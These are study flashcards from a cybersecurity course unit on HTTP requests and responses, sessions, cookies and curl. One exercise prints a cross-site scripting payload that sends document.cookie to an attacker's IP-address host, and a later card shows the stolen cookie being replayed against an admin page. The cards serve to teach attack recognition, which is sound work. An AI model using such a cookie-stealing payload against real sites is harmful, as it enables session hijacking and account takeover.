14.1 HTTP with Session and Cookies Flashcards
Securing the web requires in-depth knowledge of what topics? (4)
- Client-server architecture
- HyperText Transfer Protocol (HTTP)
- HTTP requests
- HTTP responses
The client-server model is an exchange of information, a cycle of _______ and _______ between ______ and ________.
The client-server model is an exchange of information, a cycle of requests and responses between clients and servers.
Clients and servers use the _______ to communicate on the web.
Clients and servers use the HTTP protocol to communicate on the web.
HTTP is what layer of OSI model?
Layer 7 (Application)
HTTP is used to transfer web pages, static assets such as images and HTML/markup files, and raw data, such as MP4 video or MP3 audio.
There are various types of requests, known as ________, which indicate the specific actions between the client and server.
There are various types of requests, known as HTTP methods, which indicate the specific actions between the client and server.
What are the three main kinds of HTTP methods?
- A user requests data from a server:
Ex. I’d like to see my friend’s photos on Facebook.
- A user gives data to a server:
Ex. Here are my credentials for my LinkedIn account.
- A user updates data already existing on a server:
Ex. Two new accounts have been added to the employee directory database.
What are all the various HTTP methods? (6)
- GET - Requests data from a server.
- POST - Sends data to a source, often changing or updating a server.
- PUT - Replaces current data with the new value.
- DELETE - Deletes a specified resource.
- CONNECT - Establishes a tunnel to the server.
- OPTIONS - Lists the communication options for target resource.
What is an example of a GET request?
When you open a browser and go to amazon.com, the HTTP client (your browser) asks to GET the data that the URL (amazon.com) points to. That data is the webpage.
What is an example of a POST request?
Once your browser goes to amazon.com, you need to log into your Amazon account. The client sends a POST request that contains your credentials for logging in.
What does the whitespace mean in a request?
Whitespace is a blank line indicating the end of the request.
______ is a command-line client that allows us to send data to and from servers. This allows security professionals to: (4)
curl
- Test web server security configurations.
- Ensure web servers don’t leak sensitive data through their HTTP responses.
- Verify that servers only respond to certain types of requests.
- Look for vulnerabilities on a web server.
HTTP resources are inherently ________, meaning that when your browser requests a web page, the webpage can’t distinguish you from others.
stateless
True or False: Websites need a way to deliver content that is specific to each user. To do so, they establish sessions with cookies.
True. Cookies are small pieces of text data that, when sent by an HTTP server’s response header, are saved by the user’s HTTP client.
HTTP requests are sent from an ______ to an ______
HTTP requests are sent from an HTTP client to an HTTP server
_______ are sent back from the ________ as a response to the client
HTTP responses are sent back from the HTTP servers as a response to the client
HTTP requests include: (3)
- Request line
- Request header
- Optional request body
HTTP responses include: (3)
- Status line
- Response header
- Usually a response body
Explain query parameters:
Query parameters allow you to be specific about the parts of a resource you want to send or receive data from.
Explain the PUT method:
PUT requests also send data to an HTTP server, but are often used to overwrite resources, such as updating a part of a webpage.
Explain the DELETE method
The DELETE method deletes the specified resource from the server.
Explain the CONNECT method:
The CONNECT method establishes a tunnel to the server.
Explain the OPTIONS method:
OPTIONS requests ask an HTTP server to respond with all HTTP methods that the HTTP server is programmed to respond to.
Explain what an HTTP request looks like:
A **request line** contains the request method, the name of the requested resource, and the version of HTTP in use.
- The request line can also contain **query parameters**, which the client can use to send data to the server.
**Headers** contain additional details about the requested resource. They are used to implement many actions with security implications, such as authentication and remembering user resources.
- There are many different types of headers, and you aren’t expected to remember them all.
- We’ll see the most common headers as we continue to explore requests and responses. Links to reference documentation will be provided, which you can use for your own research later.
**Whitespace** is a blank line indicating the end of the request.
Once the server receives the request, explain what it returns:
A **status line** contains the response status code and translation, such as OK or Conflict.
**Headers** contain additional information about the response, similar to request headers.
- Whitespace (a blank line) separates the header from the response body that follows.
A **response body** contains the resource requested by the client, all of the web code and styling that your browser uses to format the page.
Break down this request line:
GET /js/analytics.js HTTP/1.1
- GET: The request method.
- /js/analytics.js: The requested resource. This resource is the file path from a domain stated in the header (Host).
- HTTP/1.1: The protocol version (1.1) used by the browser.
Break down this header section (part 1):
Host: www.target-server.com
Connection: keep-alive
Host: www.target-server.com: Contains the domain name of the target server.
Connection: keep-alive: Tells the server to keep the TCP connection used for this HTTP transfer open after sending the response.
- This allows the client and server to reuse the TCP connection for later HTTP requests.
- The alternative is performing a TCP handshake: opening a connection, transferring the request and response, closing the connection, and repeating for each request response cycle.
- Since HTTP usually involves a series of requests and responses, this would result in slower transfers than simply reusing the connection.
Break down this header section (part 2):
Upgrade-Insecure-Requests: 1
Accept: text/js, text/html, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Upgrade-Insecure-Requests: 1: Tells the server to turn this HTTP connection into HTTPS, which will encrypt the response and all further communications.
Accept: text/js, text/html, */*: Tells the server that the client expects to receive a JavaScript or HTML document in response (text/js, text/html), but will accept data of any type (*/*).
User-Agent: Mozilla/4.0: Tells the server that this request is coming from a Mozilla 4.0 browser.
What are some of the common request headers? (3)
**Authorization**: Contains the credentials used to authenticate a user with a server.
**Referer**: Contains the address of the previous webpage from which the currently requested page was linked. This header allows servers to identify where people are visiting from, and may use that data for analytics, logging, or optimized caching.
- If a link from a Google search led to the current page, the referrer is Google.
**Cookie**: Contains stored HTTP cookies previously sent by the server with the **Set-Cookie** response header.
GET requests can also request data with ________.
GET requests can also request data with query parameters.
Query parameters are useful for specifying which parts of a resource to receive or send data to.
The general syntax for query parameters is:
[path]?[firstParam]=[value]&[secondParam]=[value]
There is no limit to the number of query parameters a user can send using GET requests.
POST requests are used to __________.
POST requests are used to send data to a server.
POST requests send data to an HTTP server’s resources, such as login credentials or images for a webpage.
The structure of an HTTP POST request is similar to a GET request, but includes a _______ below the whitespace.
**request body**
The request body may contain information such as login credentials or a file to be uploaded. In the current example, our request body contains login credentials.
Break down the status line in the following HTTP response:
HTTP/1.1: The unencrypted protocol is in use.
200 OK: Status code showing that the request was processed properly.
Break down the response headers in the following HTTP response:
Date: Contains a timestamp of when the response was generated.
Server: Apache/2.4.7 (Ubuntu): Indicates the server is running Apache 2.4.7 on Ubuntu.
X-Powered-By: PHP/5.5.9-lubuntu4.21: Indicates the server is running PHP version 5.5.9 on Lubuntu with kernel version 4.21.
Set-Cookie: SESSID=8toks; httponly: Tells the client to create a cookie called SESSID with the value 8toks, and that this cookie can only be set by the server with HTTP. We’ll discuss cookies and httponly in greater detail later.
Below the whitespace is the response body, which contains the source code of the resource requested in the GET request.
What do the following status codes mean?
- 200
- 300
- 400 & 404
- 500
- 200 - codes indicate success.
- 300 - codes indicate multiple choices, meaning the server can respond to the request in more than one way.
- 400 - codes indicate client errors, meaning the client sent an improperly formatted request.
  - 404 - is a common example of a 400 code, indicating that a webpage doesn’t exist or can’t be accessed.
- 500 - codes indicate server errors, meaning the server application failed somehow.
What kind of request was used here that would cause an HTTP server to tell the client all of the HTTP request methods it will respond to?
**HTTP Response 1**
```HTTP
HTTP/1.1 200 OK
Date: Tue, 25 Sep 2018 21:21:20 GMT
Server: Apache/2.2.21 (Unix mod_ssl/2.2.21 OpenSSL/1.0.0k DAV/2 PHP/5.4.3)
WWW-Authenticate: Cookie realm="fakesite"
Allow: OPTIONS, GET, POST, HEAD, PUT
```
They used the OPTIONS method here. This was the attacker’s reconnaissance phase, where they found out all available HTTP methods that can be requested to the HTTP server.
The OPTIONS method is useful for an attacker to find out what kind of request methods they can leverage while attempting to compromise an HTTP server.
What status code was returned in this response? What kind of method was used to generate this HTTP response? What sort of information was input to this HTTP request? What did the attacker try to do? Were they successful?
```HTTP
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Cookie realm="fakesite"
form-action="/login"
cookie-name=AUTH-COOKIE
Content-Type: text/html
<title>Unauthorized</title>
<form>
<br></br> <input></input><br></br> <p><label>Username: <input></input></label><br></br> </p>
<p><label>Password: <input></input></label><br></br> </p>
<p><button>Sign in</button><br></br> </p>
<p><a>Register for an account</a><br></br> </p>
</form>
```
401
While we don’t see the request, we can tell the attacker attempted to log into the login portal with a POST request.
The response body shows a username and password being entered into the web page. The response error status code 401 indicates an invalid authorization attempt.
What type of method was used in the request? What file name was uploaded to the site, according to the request body? Based on the request method and request body, what do you think happened here?
**HTTP Request 1**
```HTTP
PUT /XSS.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.fakesite.com/blog
<script>
document.location='http://133.7.13.37/cookiestealer.php?c='+document.cookie;
</script>
```
**HTTP Response 3**
```HTTP
HTTP/1.1 201 Created
Date: Mon, 05 May 2014 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Content-type: text/html
Content-length: 30
Connection: Closed
```
The attacker used the PUT method.
cookiestealer.php
The attacker could not inject XSS code without uploading a file containing it, so they used the PUT method to upload a cross-site script that steals users’ cookies and sends them to the attacker’s own server.
Is there anything interesting about the URL requested?
**HTTP Request 4**
```HTTP
GET https://www.fakesite.com/admin HTTP/1.1
Cookie: $Version="1"; AUTH-COOKIE="sdf354s5c1s8e1s"; $Path="/admin"
```
Looking at HTTP Request 4, it’s clear that the attacker stole a cookie and was able to log into the admin portal using a GET request with the stolen cookie set in the header.
What is the most basic type of curl request and why would you need to use it?
curl https://somedomain.com
For example, when working through a container that has no user interface, you’ll need a command-line tool to send and receive HTTP requests.
Running curl with the --head flag will only show ________.
Break down the following response:
Ex. curl --head https://posthere.io
```console
HTTP/1.1 200 OK
Server: nginx/1.9.2
Date: Thu, 12 Mar 2020 06:02:20 GMT
Content-Type: text/html
Content-Length: 12905
Last-Modified: Wed, 01 Jan 2020 17:09:18 GMT
Connection: close
ETag: "5e0cd23e-3269"
Accept-Ranges: bytes
```
Running curl with the --head flag will only show the response header.
- The Content-Type response header (text/html) tells our client (curl) that it is receiving a response body with the resource type HTML. This header serves the same purpose as a file name extension in your operating system.
- The Server response header tells our browser it is connecting to an nginx web server, one of the most popular HTTP servers.
Unlike a regular GET request, which returns the entire response body, POST requests need to __________________.
Unlike a regular GET request, which returns the entire response body, POST requests need to specify *where* you want to send information to.
Breakdown this POST Request with Query Parameters:
curl -X POST https://posthere.io/f260-48d9-8e1b
-X: Indicates that we are using a method other than the default GET.
POST: The method we are using.
https://posthere.io/f260-48d9-8e1b: Our unique URL that the page gave us. Everyone who uses the site is given a different URL.
Breakdown this POST Request with Plain Data:
curl -X POST -d "test data" [URL]
curl: The tool we are using.
-X: Indicates that we are using a different method than the default GET.
POST: The method we are using.
-d: Sends the data in a POST request to the server.
"test data": The message we are sending.
https://posthere.io/f260-48d9-8e1b: The unique URL that the page gave us.
How would you create a POST request to upload structured JSON data?
curl -X POST -d '{"jsonKey1": "jsonValue1", "jsonKey2": "jsonValue2"}' -H "Content-Type: application/json" [Your URL]
- This command tells the server that we are sending it JSON data with the -H option, followed by "Content-Type: application/json". The JSON body is wrapped in single quotes so that the shell passes the inner double quotes through to curl unchanged.
HTTP resources are inherently ______, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.
HTTP resources are inherently **stateless**, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.
Websites need a way to deliver content that is specific to each user. To do so, they establish ______, with ______.
Websites need a way to deliver content that is specific to each user. To do so, they establish **sessions**, with **cookies**.
Fill in the blanks:
- A ______ contains user-specific information that is saved in order to personalize an HTTP response.
- A ______ has information that uniquely identifies each session.
- The cookie is created by the HTTP server and sent to an HTTP client through a _______.
- When the HTTP server sends the client the cookie, it also sends back the __________.
- The ______ receives the cookie, saves it, and processes the personalized response body.
- On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a _______ and _______ can be received in return.
- A session contains user-specific information that is saved in order to personalize an HTTP response.
- A cookie has information that uniquely identifies each session.
- The cookie is created by the HTTP server and sent to an HTTP client through a response header.
- When the HTTP server sends the client the cookie, it also sends back the personalized response body.
- The HTTP client receives the cookie, saves it, and processes the personalized response body.
- On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a personalized response body and cookie can be received in return.
What types of attacks are cookies vulnerable to?
It’s relatively difficult to reverse engineer the contents of unique session ID cookies created with modern implementations.
- However, these cookies are still vulnerable to attacks such as cross-site scripting or man-in-the-middle attacks, which we will cover in a later unit.
- Instead of an attacker needing to figure out how to create a cookie that looks like another user’s, they can simply steal it from them.
A cookie is used to implement a ______.
A cookie is used to implement a user’s session.
A client and server exchange cookies through _______.
A client and server exchange cookies through headers.
Clients save cookies ______.
Clients save cookies locally.
A client sends a cookie via the ______ , whereas a server sends a cookie via the _______.
A client sends a cookie via the Cookie header. A server sends a cookie via the Set-Cookie header.
Bad implementations of cookies can be ______ or ______, and cookies with modern implementations can be ______.
Bad implementations of cookies can be spoofed or stolen, and cookies with modern implementations can be stolen.
Why is it important for cybersecurity professionals to know how to manage cookies with curl?
Web application security engineers need to repeatedly ensure cookies are both functional and safe from tampering.
For example, you might need to request a cookie from a webpage and then test various HTTP responses using that cookie. Doing this over and over through the browser is tedious, but can be automated with scripts.
The same concepts apply for penetration testers and hackers: curl will be used to quickly save a cookie in order to test various exploits.
For example, an HTTP server may be configured so that in order to POST data to specific pages, clients need cookies or authentication information set in their request headers that the server can verify.
What are the two options that allow users to look through headers, send data, and authenticate to servers, and also to save and send cookies?
We can use the option --cookie-jar to save the cookies set in a response header to a text file.
We can use the option --cookie to specify a text file where a cookie is saved in order to send a request with the cookies embedded in the request header.